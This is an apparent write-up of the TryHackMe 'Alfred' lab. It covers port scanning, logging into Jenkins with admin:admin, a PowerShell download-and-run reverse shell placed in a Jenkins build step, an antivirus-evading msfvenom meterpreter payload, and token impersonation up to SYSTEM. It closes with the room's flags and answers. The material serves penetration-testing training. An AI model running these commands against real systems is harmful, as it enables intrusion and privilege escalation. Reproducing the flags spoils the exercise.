TryHackMe: Alfred
Exploiting Jenkins and Windows Token
Initial Enumeration
┌──(root💀kali)-[/home/kali/Tryhackme/OSCPprep/Alfred]
└─# nmap -sV -PS -sC -iL ip.txt| tee nmap1.txt 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-05 03:09 EST
Nmap scan report for 10.10.180.87
Host is up (0.25s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2022-03-04T07:58:29
|_Not valid after: 2022-09-03T07:58:29
|_ssl-date: 2022-03-05T08:10:26+00:00; +2s from scanner time.
8080/tcp open http Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: 1sService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 59.25 seconds
Accessing port 80
Accessing port 8080
Initial Access
Find a feature of the tool that allows you to execute commands on the underlying system. When you find this feature, you can use this command to get the reverse shell on your machine and then run it:
powershell iex (New-Object Net.WebClient).DownloadString('http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-portCreate a Project
paste the given powershell command.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.58.66:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.11.58.66 -Port 1234
then click ‘Apply’ and ‘Save’.
Setting up python Simple HTTP Server and netcat listener.
Back to jenkins dashboard, build the project you made earlier.
Check your python http server
Check your netcat listener.
Command Breakdown
Source PowerShellTcp.ps1
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1Attempt to download ‘Invoke-PowerShellTcp.ps1’ script from attacker’s machine.
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.58.66:1234/Invoke-PowerShellTcp.ps1')
That’s why we set up the python simple HTTP Server earlier.
Connection to the attacker’s machine through reverse shell.
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.58.66 -Port 1234
Get the user flag once the reverse shell is successful.
PS C:\Users\bruce\Desktop> lsDirectory: C:\Users\bruce\DesktopMode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 10/25/2019 11:22 PM 32 user.txtPS C:\Users\bruce\Desktop> cat user.txt
79007a09481963edf2e1321abd9ae2a0
Transfer shell to meterpreter
To make the privilege escalation easier, let’s switch to a meterpreter shell using the following process.Use msfvenom to create the a windows meterpreter reverse shell using the following payload — THM
Generate payload format:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exemsfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.58.66 LPORT=5555 -f exe -o sumi.exe
This payload generates an encoded x86–64 reverse tcp meterpreter payload. Payloads are usually encoded to ensure that they are transmitted correctly, and also to evade anti-virus products. An anti-virus product may not recognise the payload and won’t flag it as malicious. — THM
Since we created our exe payload, now we must set msfconsole listener/meterpreter.
msfconsolemsf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.11.58.66
msf6 exploit(multi/handler) > set LPORT 5555
msf6 exploit(multi/handler) > run
Now our listener is up and running. Let’s transfer our executable payload to target machine.
Command format:
powershell "(New-Object System.Net.WebClient).Downloadfile('http://<ip>:8000/shell-name.exe','shell-name.exe')"powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.11.58.66:8000/sumi.exe','sumi.exe')"
Now we successfully transfer our exe payload to target’s machine, it’s time to execute.
Start-Process "sumi.exe"
Back to our meterpreter shell.
View all the privileges using whoami /priv
meterpreter >
meterpreter > shell
Process 2484 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\Program Files (x86)\Jenkins\workspace\test>C:\Program Files (x86)\Jenkins\workspace\test>whoami/priv
You can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability.
Enter: load incognito
to load the incognito module in metasploit.
Please note, you may need to use the use incognito command if the previous command doesn’t work. Also ensure that your metasploit is up to date.
— THM
So, what’s next?
- Back to meterpreter shell.
- Load incognito in meterpreter.
- List tokens to impersonate.
- Generate token.
# 1 Back to meterpreter shell
C:\Program Files (x86)\Jenkins\workspace\test>exit
# 2 Load incognito in meterpreter
meterpreter >
meterpreter > load incognito
Loading extension incognito...Success.
meterpreter ># 3 List tokens to impersonate
meterpreter > list_tokens -g
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEMDelegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\Users
# 4 Generate token
We can see that the BUILTIN\Administrators token is available.
Use the impersonate_token “BUILTIN\Administrators” command to impersonate the Administrators token.
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter >Even though you have a higher privileged token you may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that you migrate to a process with correct permissions. The safest process to pick is the services.exe process.
First use the ps command to view processes and find the PID of the services.exe process. Migrate to this process using the command migrate PID-OF-PROCESS
— THM
meterpreter > psProcess List
============PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
668 580 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
meterpreter > migrate 668
[*] Migrating from 964 to 668...
[*] Migration completed successfully.
meterpreter >Find the root flag
meterpreter > search -f root.txt
Found 1 result...
c:\Windows\System32\config\root.txt (70 bytes)
meterpreter >
meterpreter > cat "c:\Windows\System32\config\root.txt"
��dff0f748678f280250f25a45b8046b4a
meterpreter >Initial Access
How many ports are open? (TCP only)
Answer: 3
What is the username and password for the log in panel(in the format username:password)
Answer: admin:admin
What is the user.txt flag?
Answer: 79007a09481963edf2e1321abd9ae2a0
Swithing Shells
What is the final size of the exe payload that you generated?
Answer: 73802
Privilege Escalation
What is the output when you run the _getuid_ command?
Answer: NT AUTHORITY\SYSTEM
read the root.txt file at C:\Windows\System32\config
Answer: dff0f748678f280250f25a45b8046b4a
